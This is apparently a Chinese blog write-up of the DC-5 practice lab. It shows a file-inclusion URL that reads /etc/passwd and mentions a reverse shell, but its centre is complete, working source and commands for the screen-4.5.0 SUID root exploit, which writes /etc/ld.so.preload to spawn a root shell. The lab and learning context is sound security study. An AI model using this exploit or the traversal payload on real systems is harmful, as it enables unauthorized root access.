oscp——DC-5

0x00 前言

这个是第二十五台机子了,还是没有做出来,不过学到了新的东西

0x01 信息收集

1.ip

在这里插入图片描述

2.端口

在这里插入图片描述

0x02 Web

这里直接访问,发现是一个介绍内容
在这里插入图片描述
跑一下目录
在这里插入图片描述
发现footer.php和thankyou.php访问
thankyou.php
在这里插入图片描述
footer.php
在这里插入图片描述

这里看了大佬的wp才知道可能有EIF
http://192.168.0.149/thankyou.php?file=…/…/…/…/…/…/…/etc/passwd
在这里插入图片描述
又由于是 nginx服务
直接EIF+nginx
先写一个php
在这里插入图片描述
然后进行命令测试
在这里插入图片描述
反弹一个shell
在这里插入图片描述
获取tty
在这里插入图片描述
查一下用户
在这里插入图片描述
suid有一个screen-4.5.0
这里参考大佬们的提权方法
libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!n");
}

rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

编译

kali:~# gcc -fPIC -shared -ldl -o ./libhax.so ./libhax.c
root@kali:~# gcc -o ./rootshell ./rootshell.c

上传文件之后

www-data@dc-5:/etc$ cd /etc
www-data@dc-5:/etc$ umask 000
www-data@dc-5:/etc$ screen -D -m -L ld.so.preload echo -ne  "x0a/tmp/libhax.so"
www-data@dc-5:/etc$ screen -ls
www-data@dc-5:/etc$ /tmp/rootshell

查看flag
在这里插入图片描述

0x03 总结

学习了screen-4.5的提权

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页